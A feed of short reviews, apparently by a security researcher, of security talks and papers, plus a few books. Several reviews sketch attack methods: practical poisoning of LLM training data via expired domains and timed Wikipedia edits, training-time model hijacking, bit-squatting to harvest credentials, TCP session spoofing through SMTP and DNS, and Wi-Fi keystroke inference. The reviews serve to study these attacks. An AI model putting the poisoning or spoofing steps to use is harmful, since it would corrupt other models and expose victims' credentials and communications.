KnowledgeHub

Jacob T. reviewed Flipping Bits: Your Credentials Are Certainly Mine by STÖK

No cover — Flipping Bits: Your Credentials Are Certainly Mine (2024, SEC-T 2024)

Did you know that if you change a single bit from 1 to 0 (or …

I loved that they put in the work and it paid off!

5 stars

While there are some more crazy theoretical works out there, this talk showed how they did the work and it paid off on something not theoretically new. Basically they built a bit-squatting system that would handle DNS, SSL reg, and HTTP/IMAP/SMTP for a domain 1-bit off of the target (e.g., coogle.com instead of google.com). This technique has been around for years, but it's been very crufty, and mostly just done to do a talk. These folks spent a lot of time investing into the tooling, and they showed how quickly it paid off, 1000s of OAuth creds for F500 companies, 15k emails with scanned documents, etc.

They assumed that they'd see more hits during the solar storm, but didn't see anything, which they found correlated with a paper that seems to saw that cosmic rays are not the cause of in-memory bit-flips. They also spend a bit of time discussing …

While there are some more crazy theoretical works out there, this talk showed how they did the work and it paid off on something not theoretically new. Basically they built a bit-squatting system that would handle DNS, SSL reg, and HTTP/IMAP/SMTP for a domain 1-bit off of the target (e.g., coogle.com instead of google.com). This technique has been around for years, but it's been very crufty, and mostly just done to do a talk. These folks spent a lot of time investing into the tooling, and they showed how quickly it paid off, 1000s of OAuth creds for F500 companies, 15k emails with scanned documents, etc.

They assumed that they'd see more hits during the solar storm, but didn't see anything, which they found correlated with a paper that seems to saw that cosmic rays are not the cause of in-memory bit-flips. They also spend a bit of time discussing defenses (from AWS' approach of buying every flipped domain), to cert pinning and other app-based defenses.

Jacob T. reviewed [Keynote] Is "AI" useful for fuzzing? by Brendan Dolan-Gavitt

Discussion of AI and its applications to security seems unavoidable nowadays, and, alas, this keynote …

A nice summary of the space

4 stars

As someone who sees a lot of LLM & security research, this keynote is a nice summary of where LLMs will likely (or have already) add value, and where they will never help, regardless of LLM ability.

In short, using LLMs to generate inputs is orders of magnitude too slow to outpace the shear speed of random/semi-random mutation. Using LLMs to generate fuzzing harnesses, and to build generator logic that generates inputs will pay off, LLMs can ingest specs, code, and revise their output to get around coverage blocks.

Jacob T. finished reading [Keynote] Reasons for the Unreasonable Success of Fuzzing by Thomas Dullien

No rating

The hacker culture of my youth (90s) was a very typical male-centric teenage subculture, with …

A nice talk that blends the personal story of the speaker with a prediction about where investments in fuzzing will go to maximize their ROI.

Jacob T. reviewed TCP Spoofing: Reliable Payload Transmission Past the Spoofed TCP Handshake by Yepeng Pan

TCP spoofing—the attack to establish an IP-spoofed TCP connection by bruteforcing a 32-bit server-chosen initial …

Eye opening and clever

4 stars

Going into this read, I figured that IP spoofing was of niche availability and applicability, especially in our TLS-dominated world. However, federated services such as SMTP, or database replication commonly use IP addresses for validation.

There are two core new discoveries here, a TCP stack weakness that results in dramatically smaller search spaces to brute-force the correct ISN to continue a TCP session (as few as four guesses!), and a few techniques for determining the ISN outright. Of these, the application-specific ones are cute and reliable. SMTP is the easiest to explain, but if you host your own DNS server for an attacker-controlled domain name, you can spoof a handshake that includes a "HELO .attacker.com". Once you get a hit on that DNS server, you have the correct ISN and can continue the session. Coupled with SPF records which specify which IPs/domains can send email on behalf of a domain, …

Going into this read, I figured that IP spoofing was of niche availability and applicability, especially in our TLS-dominated world. However, federated services such as SMTP, or database replication commonly use IP addresses for validation.

There are two core new discoveries here, a TCP stack weakness that results in dramatically smaller search spaces to brute-force the correct ISN to continue a TCP session (as few as four guesses!), and a few techniques for determining the ISN outright. Of these, the application-specific ones are cute and reliable. SMTP is the easiest to explain, but if you host your own DNS server for an attacker-controlled domain name, you can spoof a handshake that includes a "HELO .attacker.com". Once you get a hit on that DNS server, you have the correct ISN and can continue the session. Coupled with SPF records which specify which IPs/domains can send email on behalf of a domain, it's a powerful phishing/spam primitive.

The brute-forcing and generic TCP stack techniques were clever, but were a bit more difficult to understand from the paper, and likely less robust in real-world network scenarios. One required maintaining a server's connect queue at close to a buffer limit, which may be difficult with other legitimate traffic. Still a good read!

Jacob T. reviewed Poisoning Web-Scale Training Datasets is Practical by Nicholas Carlini

Deep learning models are often trained on distributed, web-scale datasets crawled from the internet. In …

Empirical evidence of LLM attacker economics

5 stars

With the race to collect and train on ever more data (and re-train on the latest data more quickly), the ability for LLM creators to perform even cursory checks against training set corruption is almost nil. This paper shows two ways an attacker can corrupt 0.01-1% of a LLM training dataset for a reasonable sum. Existing works have shown that for a specific desired error state, a 0.01% training data poisoning attack can yield a 60-90% chance of tampering with model performance.

There are two core primitives presented in this paper: 1. The corpi release a metadata archive of URLs, and then the fetched content. There are enough expired domains in the metadata that allows for an attacker to corrupt a percentage of the URLs being scraped. 2. Wikipedia is converted into a timestamped dump (e.g., a ZIM file) in a predictable order, and on a predictable schedule. By changing …

With the race to collect and train on ever more data (and re-train on the latest data more quickly), the ability for LLM creators to perform even cursory checks against training set corruption is almost nil. This paper shows two ways an attacker can corrupt 0.01-1% of a LLM training dataset for a reasonable sum. Existing works have shown that for a specific desired error state, a 0.01% training data poisoning attack can yield a 60-90% chance of tampering with model performance.

There are two core primitives presented in this paper: 1. The corpi release a metadata archive of URLs, and then the fetched content. There are enough expired domains in the metadata that allows for an attacker to corrupt a percentage of the URLs being scraped. 2. Wikipedia is converted into a timestamped dump (e.g., a ZIM file) in a predictable order, and on a predictable schedule. By changing Wikipedia articles just before archival, even if they are reverted by attentive editors, they will persist in the dump. The authors estimate that they could alter ~6.5% of Wiki articles during this process.

Jacob T. reviewed Sponge Examples: Energy-Latency Attacks on Neural Networks by Ilia Shumailov

The high energy costs of neural network training and inference led to the use of …

A devious optimization goal

5 stars

This paper explores input to DNN models that cause an asymptotic increase in power usage or timing. By using genetic algorithms in a white-box setting, the researchers could find image and text inputs that would drive up inference effort.

The results were impressive, causing a 6000x slowdown on a hosted Azure translation model.

Jacob T. reviewed Password-Stealing without Hacking: Wi-Fi Enabled Practical Keystroke Eavesdropping by Jingyang Hu

The contact-free sensing nature of Wi-Fi has been leveraged to achieve privacy breaches, yet existing …

Pretty amazing accuracy for a eaves-droppable side-channel

5 stars

This paper explores recovering victim key-presses through a Wi-Fi data channel know as Beam-forming Feedback Information. BFI is used to help wireless APs adjust their beam-forming TX to improve performance, but BFI contains data correlated by changes in device orientation, and the attenuation from nearby movement (e.g., fingers on keyboard). By training a NN, the researchers were able to recover numeric key-presses (from a numeric keyboard) with ~88% accuracy across a variety of devices.

Pretty impressive, and shows how difficult it is to account for side-channels across all the layers of the stack when it's relatively easy to train a very sensitive ML model to extract a tiny signal from the noise.

Jacob T. finished reading On the use of compression algorithms for network anomaly detection by Christian Callegari

No rating

Short easy read comparing three different compression algorithms for their performance in detecting suspicious log data from the DARPA '99 dataset.

Jacob T. reviewed Sparks by Ian Johnson

Sparks (2023, Oxford University Press, Incorporated)

Powerful

5 stars

A frank look into the long-term, and ongoing rewriting of history by the CCP, as well as the brave few who manage to continue to document and catalog the past as a time capsule for future generations.

Amazing how one of the largest man-made mass deaths is little known, and almost never studied in Western history. This book opens more questions than it answers, but helpfully comes with a guide for where to go next to learn more.

Not particularly cheery, but there is a glimmer of hope that shines throughout.

Jacob T. finished reading Skunk Works by Ben R. Rich;Leo Janos

Skunk Works (AudiobookFormat, 2015, Hachette Audio and Blackstone Audio)

No rating

A good story, obviously a rosy view, but nice to see how things were done so long ago. Thanks to @casey for the recommendation, and a nice reminder about how regulatory scar-tissue will be the death of any DoD-connected innovation centers.

Jacob T. started reading Skunk Works by Ben R. Rich;Leo Janos

No rating

Another @casey recommendation

Jacob T. reviewed HECO: Fully Homomorphic Encryption Compiler by Alexander Viand

HECO: Fully Homomorphic Encryption Compiler (2023, Arxiv)

In recent years, Fully Homomorphic Encryption (FHE) has undergone several breakthroughs and advancements, leading to …

An improvement in usability

4 stars

This paper covers a compiler for more traditional imperative code to be converted to optimized (and batched) FHE operations via the SEAL library. The frontend is Python, which is then converted to multiple simplification and optimization passes in the CPP MLIR.

Both synthetic/toy examples and more real-world applications are created in pure imperative implementations (that require non-performant emulation steps), compiled with HECO, and built with FHE optimizations manually. The HECO performance is close to the hand-optimized in most scenarios, even edging it out in a few.

Hopefully the spread of this tool will help FHE reach the masses.

Jacob T. reviewed Two-in-One: A Model Hijacking Attack Against Text Generation Models by Wai Man Si

Machine learning has progressed significantly in various applications ranging from face recognition to text generation. …

Less plausible than Adversarial Reprogramming

3 stars

This paper covers a highly-effective (85%+) hijack attack where training data is tainted by an adversary, and then the model can be cajoled into performing other types of tasks. While this work is a steep closer to a more general-type of attack, the model is less plausible than inference-time attacks popularized in the Adversarial Reprogramming literature.

Jacob T. reviewed Adversarial Reprogramming of Neural Networks by Gamaleldin F. Elsayed

Deep neural networks are susceptible to \emph{adversarial} attacks. In computer vision, well-crafted perturbations to images …

The first "RCE" against ML that I came across

5 stars

I have sent this paper to a number of people over the years from when it first came out, I am surprised there is less attention to this type of attack, despite being a white-box model. This is the first class of attack that lets the attacker reprogram an image classification model to perform an attacker-determined task (e.g., turning an image classifier into a counter task).

Reviewing this paper 5 years after its release, it still stands up, and I see there is a small field of work in this lineage that includes similar attacks against NLP classifiers. I would count this paper as the starting point for this class of attack, which is an impressive and high-impact field.

Jacob T. reviewed Freaky Leaky SMS: Extracting User Locations by Analyzing SMS Timings by Evangelos Bitsikas

Short Message Service (SMS) remains one of the most popular communication channels since its introduction …

An improvement over the state-of-the-art with real-world consequences

3 stars

While silent SMSes have been used by authorities for quite some time to geolocate cell-phones, this work puts a less powerful capability into the hands of anyone. By training a ML model on the RTT from sending a silent SMS to phones in different [known] locations, a temporal map of the GSM network can be made to later classify RTTs when targeting a victim phone and approximate their location to country/region.

Without cooperation of the cell infrastructure it's pretty coarse-grained, but still a scary way to figure out where a target of interest is without alerting them.